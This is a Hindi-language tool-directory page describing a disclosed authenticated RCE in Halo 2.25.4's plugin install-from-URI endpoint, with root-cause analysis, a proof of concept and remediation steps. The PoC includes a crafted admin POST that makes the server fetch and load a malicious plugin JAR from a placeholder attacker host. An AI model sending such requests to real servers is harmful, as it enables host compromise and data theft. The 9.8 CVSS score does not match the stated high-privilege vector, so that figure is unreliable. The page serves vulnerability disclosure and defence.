Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
halo-2.25.4-CVE-2026-67919 — Halo 2.25.4 में अमान्य प्लगइन URI इंस्टॉलेशन के माध्यम से प्रमाणित रिमोट कोड निष्पादन भेद्यता का प्रदर्शन करता है, जिसमें तकनीकी विश्लेषण और प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट शामिल है। | Kitploit
उपकरण/GitHubGitHub/unpredictable21/halo-2.25.4-cve-2026-67919
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubunpredictable21/halo-2.25.4-cve-2026-67919

halo-2.25.4-CVE-2026-67919

Halo 2.25.4 में अमान्य प्लगइन URI इंस्टॉलेशन के माध्यम से प्रमाणित रिमोट कोड निष्पादन भेद्यता का प्रदर्शन करता है, जिसमें तकनीकी विश्लेषण और प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट शामिल है।

रिपॉजिटरी देखें
61 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Halo 2.25.4 में अमान्य प्लगइन URI इंस्टॉलेशन के माध्यम से प्रमाणित रिमोट कोड निष्पादन (RCE)

1. भेद्यता सारांश

Halo संस्करण 2.25.4 में एक गंभीर सुरक्षा भेद्यता की पहचान की गई है। एप्लिकेशन दूरस्थ URI से प्लगइन्स इंस्टॉल या अपग्रेड करने के लिए एक प्रशासनिक एंडपॉइंट प्रदान करता है। हालाँकि, सिस्टम URI के स्रोत डोमेन को मान्य करने में विफल रहता है और इस विशिष्ट घटक पर सर्वर-साइड रिक्वेस्ट फोर्जरी (SSRF) सुरक्षा का अभाव है। प्लगइन प्रबंधन विशेषाधिकारों वाला एक प्रमाणित हमलावर दुर्भावनापूर्ण रूप से तैयार किए गए प्लगइन JAR फ़ाइल के लिंक की आपूर्ति कर सकता है। सर्वर PF4J फ्रेमवर्क और Spring के DefaultPluginApplicationContextFactory का उपयोग करके JAR फ़ाइल को डाउनलोड करेगा, अस्थायी रूप से संग्रहीत करेगा, और JVM संदर्भ में गतिशील रूप से लोड करेगा। यह अविश्वसनीय एक्सटेंशन कक्षाओं के निष्पादन की अनुमति देता है, जिसके परिणामस्वरूप अंतर्निहित होस्ट ऑपरेटिंग सिस्टम पर मनमाना रिमोट कोड निष्पादन (RCE) होता है।

2. भेद्यता विवरण

  • भेद्यता प्रकार: कोड इंजेक्शन / रिमोट कोड निष्पादन (RCE)
  • CWE ID: CWE-94: कोड के निर्माण का अनुचित नियंत्रण ('कोड इंजेक्शन') / CWE-434: खतरनाक प्रकार वाली फ़ाइल का अप्रतिबंधित अपलोड
  • गंभीरता: 🔴 गंभीर
  • अनुमानित CVSS v3.1 स्कोर: 9.8 (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)
  • प्रभावित संस्करण: Halo 2.25.4 (और संभावित रूप से URI-आधारित प्लगइन इंस्टॉलेशन का समर्थन करने वाले पिछले संस्करण)
  • CVE ID: CVE-2026-67919
  • 3. प्रभावित घटक

    CVE फॉर्म में सबमिट करते समय कृपया अल्पविराम से अलग करें:

    Plaintext

    root@kitploit:~
    PluginEndpoint.java, installFromUri method, DefaultPluginApplicationContextFactory
    

    4. हमला वेक्टर

    एक प्रमाणित व्यवस्थापक /apis/api.console.halo.run/v1alpha1/plugins/-/install-from-uri एंडपॉइंट पर एक दुर्भावनापूर्ण दूरस्थ प्लगइन JAR URL युक्त एक क्राफ्टेड HTTP POST अनुरोध भेज सकता है।

    5. तकनीकी विश्लेषण और हमला श्रृंखला

    रिमोट कोड निष्पादन निम्नलिखित संचालन अनुक्रम के माध्यम से होता है:

    1. एंडपॉइंट अंतर्ग्रहण: PluginEndpoint.installFromUri() विधि आने वाले अनुरोध निकाय (InstallFromUriRequest) को संसाधित करती है और उपयोगकर्ता द्वारा आपूर्ति की गई uri स्ट्रिंग को निकालती है। कोई डोमेन व्हाइटलिस्ट फ़िल्टरिंग लागू नहीं की जाती है।
    2. असुरक्षित फ़ाइल पुनर्प्राप्ति: निकाला गया URI DefaultReactiveUrlDataBufferFetcher.fetch(uri) को पास किया जाता है। Halo में अन्य आंतरिक नेटवर्किंग घटकों के विपरीत, यह फेचर HttpSecurityUtils.secureHttpClient() को लागू नहीं करता है, जिससे आंतरिक निजी नेटवर्क/लूपबैक IP प्रतिबंध (SSRF सुरक्षा) छूट जाते हैं।
    3. स्थानीय फ़ाइल दृढ़ता: दूरस्थ URI से डाउनलोड की गई स्ट्रीमिंग सामग्री writeToTempFile(content) के माध्यम से होस्ट सर्वर पर एक स्थानीय अस्थायी निर्देशिका में लिखी जाती है।
    4. गतिशील क्लास लोडिंग: एप्लिकेशन अस्थायी पथ को pluginService.install(path) पर पास करता है, जो JAR फ़ाइल को अनपैक और लोड करने के लिए PF4J JarPluginLoader का उपयोग करता है।
    5. Spring बीन पंजीकरण और निष्पादन: PF4J संदर्भ लोड करना समाप्त करने के बाद, Spring का DefaultPluginApplicationContextFactory स्वचालित रूप से प्लगइन के plugin.yaml के अंदर मेटाडेटा को पार्स करता है और सभी घोषित एक्सटेंशन कक्षाओं को सक्रिय Spring बीन्स के रूप में एप्लिकेशन संदर्भ में पंजीकृत करता है।
    6. कोड निष्पादन ट्रिगर: एक्सटेंशन क्लास के स्टैटिक इनिशियलाइज़ेशन ब्लॉक (static {}) या @PostConstruct के साथ एनोटेट किए गए मेथड ब्लॉक के अंदर रखा गया कोई भी दुर्भावनापूर्ण कोड Runtime.getRuntime().exec() के माध्यम से इंस्टेंस निर्माण के दौरान तुरंत निष्पादित किया जाएगा।

    संवेदनशील स्रोत कोड खंड (PluginEndpoint.java पंक्तियाँ 422-428):

    Java

    root@kitploit:~
    var content = request.bodyToMono(InstallFromUriRequest.class)
        .map(InstallFromUriRequest::uri)
        .flatMapMany(reactiveUrlDataBufferFetcher::fetch);  // अमान्य नेटवर्क फेच
    return Mono.usingWhen(writeToTempFile(content), pluginService::install, this::deleteFileIfExists);
    

    6. प्रूफ ऑफ कॉन्सेप्ट (PoC)

    चरण 1: दुर्भावनापूर्ण आर्टिफैक्ट होस्ट करें

    हमलावर एक मानक PF4J/Halo प्लगइन JAR फ़ाइल (poc-plugin.jar) संकलित करता है जिसमें @PostConstruct लाइफसाइकिल हुक या स्टैटिक ब्लॉक के अंदर पेलोड निष्पादन तंत्र वाली एक एक्सटेंशन क्लास होती है। हमलावर इसे बाहरी लिसनर पर होस्ट करता है:

    Bash

    root@kitploit:~
    python3 -m http.server 9999
    

    चरण 2: भेद्यता को ट्रिगर करना

    प्रमाणित प्रशासनिक उपयोगकर्ता लक्ष्य Halo सर्वर पर निम्नलिखित HTTP अनुरोध भेजता है:

    HTTP

    root@kitploit:~
    POST /apis/api.console.halo.run/v1alpha1/plugins/-/install-from-uri HTTP/1.1
    Host: <target-ip>:8090
    Authorization: Bearer <ADMIN_TOKEN_HERE>
    Content-Type: application/json
    
    {
      "uri": "http://<attacker-ip>:9999/poc-plugin.jar"
    }
    

    चरण 3: अपेक्षित परिणाम

    सर्वर इंस्टॉलेशन को संसाधित करता है, हमलावर के सर्वर से आर्टिफैक्ट प्राप्त करता है, एक्सटेंशन को पंजीकृत करता है, और संकलित सिस्टम कमांड को निष्पादित करता है, जिससे लक्ष्य होस्ट से समझौता होता है।

    image
    image

    7. प्रभाव

    • सिस्टम समझौता: एप्लिकेशन प्रक्रिया के विशेषाधिकारों के तहत होस्टिंग इंफ्रास्ट्रक्चर या Docker कंटेनर तक पूर्ण पहुंच।
    • डेटा चोरी: बैकएंड डेटाबेस, संवेदनशील एप्लिकेशन क्रेडेंशियल्स, कॉन्फ़िगरेशन कुंजियों (application.yaml), और संग्रहीत फ़ाइलों का सीधा एक्सपोज़र।
    • पार्श्व गति: सर्वर को आंतरिक साइट नेटवर्क पर हमला करने के लिए पिवोट किया जा सकता है क्योंकि डाउनलोड तंत्र मानक ईग्रेस नियमों को दरकिनार करते हुए लूपबैक या आंतरिक इंफ्रास्ट्रक्चर एंडपॉइंट तक पहुंच सकता है।

    8. उपचार सिफारिशें

    1. पूर्ण डोमेन व्हाइटलिस्ट लागू करें: आने वाले uri तर्क पर सख्त सत्यापन नियम लागू करें। दूरस्थ इंस्टॉलेशन स्कीमा को सत्यापित, विश्वसनीय आधिकारिक इकोसिस्टम मार्केटप्लेस (जैसे, https://awesome.halo.run) तक प्रतिबंधित करें।
    2. सुरक्षित फेचर्स एकीकृत करें: लूपबैक (127.0.0.1), लिंक-लोकल (169.254.169.254), या निजी क्लास नेटवर्क (10.0.0.0/8, 192.168.0.0/16) की ओर इशारा करने वाले अनुरोधों को छोड़ने के लिए DefaultReactiveUrlDataBufferFetcher को मौजूदा HttpSecurityUtils.secureHttpClient() उपयोगिता का उपयोग करने के लिए रीफैक्टर करें।
    3. क्रिप्टोग्राफिक प्लगइन सत्यापन: बाहरी JAR मॉड्यूल के लिए डिजिटल हस्ताक्षर सत्यापन मानक लागू करें। JarPluginLoader संदर्भ को DefaultPluginApplicationContextFactory को संदर्भ इंस्टेंशिएशन के लिए पास करने से पहले आधिकारिक रिपॉजिटरी द्वारा प्रदान की गई सार्वजनिक कुंजियों के विरुद्ध फ़ाइल हैश या क्रिप्टोग्राफिक हस्ताक्षरों को मान्य करना चाहिए।
    टूल डाउनलोड करें